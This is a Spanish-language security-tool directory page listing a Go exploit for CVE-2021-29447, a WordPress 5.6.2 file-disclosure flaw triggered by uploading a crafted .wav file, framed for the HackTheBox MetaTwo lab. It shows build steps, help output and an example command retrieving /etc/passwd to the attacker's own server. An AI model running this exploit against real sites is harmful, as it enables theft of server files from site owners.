Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
exploit_cve-2021-29447 — Exploit basado en Go para CVE-2021-29447 dirigido a WordPress 5.6.2 con PHP 8. Genera un payload .wav malicioso para recuperar archivos arbitrarios del servidor mediante la carga de medios, requiriendo acceso básico a wp-admin. | Kitploit
Herramientas/GitHubGitHub/mega8bit/exploit_cve-2021-29447
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubmega8bit/exploit_cve-2021-29447

exploit_cve-2021-29447

Exploit basado en Go para CVE-2021-29447 dirigido a WordPress 5.6.2 con PHP 8. Genera un payload .wav malicioso para recuperar archivos arbitrarios del servidor mediante la carga de medios, requiriendo acceso básico a wp-admin.

Ver Repositorio
71hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

exploit_cve-2021-29447

Solo para fines educativos.

Se supone que este exploit es una herramienta muy conveniente para obtener cualquier archivo de un servidor que ejecute wordpress 5.6.2 y php8. (ver https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

Todo lo que necesitas es acceso básico a wp-admin y la capacidad de subir un archivo multimedia.

El exploit generará un payload de archivo .wav para subir usando wp-admin.

Luego utiliza el servidor de retorno del exploit para darte el archivo deseado directamente en tu consola.

El uso perfecto es la máquina de HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

til

Uso/Ejemplos

$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

Descargar herramienta